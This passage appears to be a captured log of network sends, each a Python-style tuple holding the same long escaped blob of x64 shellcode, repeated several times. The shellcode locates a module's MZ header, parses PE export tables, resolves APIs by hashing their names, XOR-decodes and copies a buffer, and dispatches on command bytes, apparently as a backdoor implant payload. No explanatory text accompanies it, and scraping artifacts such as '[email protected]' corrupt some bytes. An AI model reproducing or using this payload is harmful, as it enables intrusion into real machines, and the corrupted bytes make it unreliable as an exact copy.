\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 7, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 9, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 